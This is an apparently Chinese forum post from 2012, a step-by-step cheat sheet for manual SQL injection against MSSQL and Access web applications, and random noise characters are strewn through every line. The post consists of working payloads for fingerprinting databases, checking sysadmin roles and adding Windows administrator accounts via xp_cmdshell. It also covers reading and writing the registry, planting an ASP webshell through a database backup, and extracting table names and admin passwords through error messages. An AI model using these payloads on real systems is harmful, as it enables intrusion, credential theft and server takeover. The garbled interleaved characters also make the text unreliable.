1.判断是否有注入
& u( J5 f0 w: H) h4 X( u* I;and 1=1 # H+ ]) ^% P: H4 I
;and 1=2 ( w0 @! Y( g( p& \; A) `/ E! c
8 M) Q6 K9 J& }# `* b" j2.初步判断是否是mssql : C+ I& h# F2 M/ P
;and user>0 7 f: a X9 w3 m: V V7 N
- p# }) e# O+ s- Q" G$ o1 G
3.判断数据库系统 ( M, M3 m& U' k4 {8 s
;and (select count(*) from sysobjects)>0 mssql ) {8 Q! K; O8 g* N
;and (select count(*) from msysobjects)>0 access
8 J& [* h; d$ x% F, x) c) ~% k6 J( v+ r1 x# V( }; x8 ]
4.注入参数是字符
, D# N( g& ~0 Z/ n) ['and [查询条件] and ''='
6 F! U" n; A0 S* g
3 ^! C, y! d' w4 K! y5.搜索时没过滤参数的 . M( t8 a! I' l3 g4 e9 [( `
'and [查询条件] and '%25'='
1 O# i/ T* g7 I
, @/ P" q1 n4 P6.猜数表名
' G9 k9 m, v. j. S;and (select Count(*) from [表名])>0
6 d# @) ?+ L9 g- e( V" ]( d- | D* L1 q' y$ X# T3 n7 `8 j* k3 u9 A: j7 [5 R
7.猜字段 , e L+ Y" u! E- @) v
;and (select Count(字段名) from 表名)>0 ! }6 }' M+ u& M
3 s# h- ]4 V1 b0 n2 L9 G8.猜字段中记录长度 9 s9 E9 [7 y+ U' W
;and (select top 1 len(字段名) from 表名)>0
' X$ `8 A( D7 [3 l% Z+ R5 k2 w' g7 P; J% ]) ^% Y
9.(1)猜字段的ascii值(access)
4 H( i- m3 R# ^; f; q;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
2 P) ]1 j( B- Z: i* e0 f6 j( a" ^# M3 i5 M4 |+ \ G+ B
(2)猜字段的ascii值(mssql) 0 }. m7 e8 M* [ r/ V7 o- T
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0 / V7 b: F' f' ]$ P
6 |9 R3 P9 \: L( p( |4 @7 Z! B10.测试权限结构(mssql) / W: P" d+ X7 C& F3 k! l, n
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- % I3 N0 b1 E% ]
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ; ?, M M# H `1 W" E
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ; z, F. D' F/ K w
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- / [' C8 ~$ s- u& N$ G- w: Q' Y
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- + s S6 `( B; o/ y9 L6 P9 [
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- & z: \; v4 O7 K1 B( d
;and 1=(select IS_MEMBER('db_owner'));-- * M1 z7 j. w7 b A9 k C. m; k( ]
" `8 \( [2 \( K0 H
11.添加mssql和系统的帐户
; t$ h4 t/ ~0 N;exec master.dbo.sp_addlogin username;--
+ |8 d' |( g; W: Q( Z% o8 t k;exec master.dbo.sp_password null,username,password;-- 9 A) C1 |. |" u. I
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
/ V8 o6 E( B! x/ y! d7 }* d;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
5 w$ [% K. N3 W% F# ^0 x( o;exec master.dbo.xp_cmdshell 'net user username password /add';--
+ h$ g4 W) e+ _/ c7 g& |6 F;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
0 G/ d% y! B6 n( V7 ^$ o: s8 {& Y, q2 i7 I# p. Z: e
12.(1)遍历目录
) U( ?; Z9 F- b* F0 \) J' X7 T' f;create table dirs(paths varchar(100), id int)
1 h/ G5 v4 |' c7 t6 F;insert dirs exec master.dbo.xp_dirtree 'c:\'
C6 s( ~3 f: z( o. z& D5 O;and (select top 1 paths from dirs)>0 ) z8 c+ E3 a- k8 X, X( H/ w+ x p) M
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
; {1 C! L& r; E3 w
# Y6 C" R, ]+ a/ t: U# G3 O! Y- m(2)遍历目录 * @3 m- V9 H' Z! J* I, N
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ! h- ?: H9 _3 }" F
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
, y9 u' t/ U0 i2 U' a;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 3 O6 F: h5 z$ x) a$ }2 T
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
. M- S3 s, Z# u& S$ P& k;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
# F) e: i" ~; k
: |) `9 V6 f2 I13.mssql中的存储过程
2 X9 H, z7 }8 k7 T7 yxp_regenumvalues 注册表根键, 子键
& n; R( A/ B) f$ k7 r& X7 x;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
4 P; k& k G* q/ ~5 F: K* Uxp_regread 根键,子键,键值名 6 L) V& w, e! }# |. e
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值
" z2 r2 X* |: C* h5 Dxp_regwrite 根键,子键, 值名, 值类型, 值 $ X0 l$ J# U$ i2 a
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
# s; { X, ` ]4 u. r. w% |;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName','reg_sz','hello' 写入注册表 + h- Y) G0 }/ {3 O: w
xp_regdeletevalue 根键,子键,值名
/ z1 Q% y' k% X% Eexec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' 删除某个值 ( ]8 n# P) `1 W, P N3 b
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 3 C M) I1 L* C& {
" {) H; e3 r+ @# P5 `
14.mssql的backup创建webshell
4 Y/ q8 _% I/ \5 l: }use model
: k/ n3 n& k, Ecreate table cmd(str image); , b% ?1 p* O# O1 E
insert into cmd(str) values ('<% Dim oScript %>');
' E4 h: v' L# V, lbackup database model to disk='c:\l.asp';
- S1 u7 r0 ?7 ~: S! h! m2 ?/ h
" E' V* l v1 X8 O15.mssql内置函数 ( ~) ]/ h2 w6 I# v6 d0 k. h% Q
;and (select @@version)>0 获得Windows的版本号 * D! w4 P7 D; Y- i$ l
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
% Z2 ^3 S) f( t2 C. @. U1 j;and (select user_name())>0 爆当前系统的连接用户 7 M5 v5 V- B$ f7 I0 A1 x1 W. u( S
;and (select db_name())>0 得到当前连接的数据库 : i+ {2 {3 ?% ?& T
7 A6 t4 p0 `' ^& d2 I3 ?4 w v. o. v1 t
% y" X4 a! y3 e8 \6 f$ D
MSSQL手注暴库0 X+ }' F8 u7 l1 S' z' k% p
8 T0 N- D/ D/ L) R
1.暴出当前表名和列名
+ e+ O# n3 R6 ]/ [在注入点后提交“'having 1=1--",得到返回信息为英文,在这段英文中即可看到一个表名和一个列名。提交“group by 暴出的表名列名having 1=1--",可得到另一个列名;继续提交“group by 暴了的表名列名,暴出的表名.第2个列名 having 1=1--",可再得到一个列名。用同样的方法提交,直到页面不再返回错误信息,就可以得到所有的列名。小知识:暴表名与列名是在SQL语句中“having 1=1—"与GROUP BY结合使用,进行条件判断的。由于语句不完整,因此数据库返回错误信息,并显示一个表名和一个列名。基本方法只能暴出数据库中的当前表,如果某个表中包含的列名非常多,用上基本方法就非常困难了。
8 L3 N9 ]9 D( k+ k t$ o; O, C0 R
第一.爆出所有数据库名# D' L1 N% n+ x4 m) }! p W
利用“and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])"语句,暴出数据库中任意表名和列名,其中“[N]"表示数据库中的第N个表。- u* `+ i* }4 H
第一步:在注入点后提交如下语句:“and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=12)",因为 dbid 的值从1到5,是系统使用的,所以用户自己建的一定是从6开始的,并且我们提交了 name>1,name字段是一个字符型的字段,和数字比较会出错因此在提交后,IE会返回如下的信息:“Microsoft OLE DB Provider for ODBC Drivers 错误 ?e07' [Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Northwind' 转换为数据类型为 int 的列时发生语法错误。",这样就把name字段的值暴出来了,也就是我们得到了一个库名“Northwind"。改变“dbid"的值可以得出所有的库名。. g$ i4 j8 d, j- N
5 d/ d& i) ?1 F G: H6 ~% i9 {$ d; C
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])-- 修改N从6开始爆出所有数据库名
& @/ j# h. Q+ Y+ X, c6 ^- l v& w! N$ z4 h: u! F6 L
- u( C' _- x% `+ O第二.爆出指定库中的所有表名: F* V& W, J; U
得到了库名后,现在要得到库中所有的表名,提交如下语句:"and 0<>(select top 1 name from master.dbo.sysobjects where xtype='U') ",这里要暴的是master这个库中的表名,查询的SQL语句返回的是name的值,然后和数字0比较,这样就会暴露出name的值。提交后一个表名为“'spt_monito"就被暴出来了。9 Z- K1 p3 v: k! W' g
再接着暴其他的表,继续提交如下语句:“and 0<>(select top 1 name from master.dbo.sysobjects where xtype='U' and name not in('spt_monito'))"提交后,又暴出一个表名为"cd512"。依次提交"and name not in(' spt_monito',' cd512',..))"就可以查出所有的表名。2 k3 `$ M7 N# y7 e0 P) d
7 N% c0 C$ `4 n% i; y. Iand 0<>(select top 1 name from [指定库名].dbo.sysobjects where xtype='U')--
6 W! H3 q: @9 f* x; Rand 0<>(select top 1 name from [指定库名].dbo.sysobjects where xtype='U' and name not in('[爆出的表名]'))--; |' b' j+ h M0 q; v
and 0<>(select top 1 name from [指定库名].dbo.sysobjects where xtype='U' and name not in('[爆出的表名]','[爆出的第二表名]'))--& W! `4 g* I+ `, p1 N
* Z; V) h: X6 t& _8 b2 t( t
4.爆出指定表中的所有列名$ T# {0 q# V/ N i7 k! w* M
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) ; @$ ~ {6 y& d) R8 |
//把ID值转成字符型后再和一个整型值比较。ID号出来了。值为:949578421 name='表名'
) Z2 _2 R# s# j% q$ q
' ]* F* \9 g6 u" ] \* G, u8 G) h% dand 0<>(select top 1 name from wutong.dbo.syscolumns where id=949578421)-- 爆出admin表中的一个字段名
0 Y2 o6 B& [) h U4 H% b1 ~
' i$ q# Y7 E/ k0 f% i再提交and 0<>(select top 1 name from wutong.dbo.syscolumns where id=949578421 and name not in('adduser'))-- 8 q1 S% ^8 T7 e+ M0 w6 ?; T
依次提交"and name not in(' spt_monito',' cd512',..))"就可以查出admin表中的所有字段名。
% R# w" O! x' o, b; H1 P ^9 y% \% L6 S& u3 d$ d; d6 n! c
3 q9 ]! \% [: b# v( b0 d8 J
and 0<>(select count(*) from [指定库名].dbo.sysobjects where xtype='U' and name='[要爆字段的表名]' and uid>(str(id)))-- 爆出要爆字段的表名id值
$ g8 t; [% n2 ]% M9 k1 O- W7 n" O, v
and 0<>(select top 1 name from [指定库名].dbo.syscolumns where id=爆出的id值)-- 爆出id值表中的一个字段名
% o7 d% e- \# U4 F& v7 o w* q: j& |' c8 e; l
and 0<>(select top 1 name from [指定库名].dbo.syscolumns where id=爆出的id值 and name not in('[爆出的字段名]'))-- 4 m* C: C. u7 C
$ g. j4 v. b+ ^! F& R9 @, w# i B# G3 l4 i" D" L
( f W. f/ t1 n9 v* h5 |
5.读取指定表中的数据0 c8 V( ]3 e% ?3 l- Q8 k, \
: Y, {; D p" Eand 0<(select A_ID from wutong.dbo.admin where A_UserID>1)-- 爆出A_PWD的内容 - `& f7 E- d7 C* V
- C6 u1 a. w3 R" Mand 0<(select [一个存在的字段] from [指定库名].dbo.[要查询的表名] where [要爆内容的字段名]>1)--
: G' ?: r6 s# F+ O5 Q9 {, Q# _ W5 c; c. s* W8 S/ u7 ^
and 0<(select A_ID from wutong.dbo.admin where A_PWD>1 and A_UserID='admin')-- 爆出admin的密码8 G/ c8 u% a9 s2 ^( p# ?
# n; Z' i0 L' u4 L* W
) y% u/ {7 D/ @& S7 A \& pand 0<(Select Top 1 A_UserID FROM admin where A_ID<>1)-- 爆出id<>1的管理员名字(fuhao)
/ U# o' Z0 i* T
) p0 O, }3 }6 I$ O* Dand 0<(Select Top 1 A_UserID FROM admin where A_ID <>1 and A_UserID <> 'fuhao')-- 爆出第二个管理员的名字 <>不等于(tuiguang)
) [) ~# }& Q; s: U, e4 u* {) x
' x' V$ W. J1 w! k0 {; U* c/ Q+ Fand 0<(Select Top 1 A_UserID FROM admin where A_ID <>1 and A_UserID <> 'fuhao'and A_UserID <> 'tuiguang')--
' X# ~% G2 ~6 H$ H3 ~; X: R- h0 {5 G' r* W
知道了数据库的表名、列名后,可以利用“查询语句"读取数据库中的任意信息。例如要读取某个表中某列中的第N个数据,可提交语句:“and (Select Top 1 列名 FROM 表名 where id=[N])>1"( [N]代表列中的第N条数据),从IE返回信息中即可得知想要的数据。: u2 J2 w0 U Q6 M# B- B
|
发表于 2012-9-15 14:31:51
收藏
支持
反对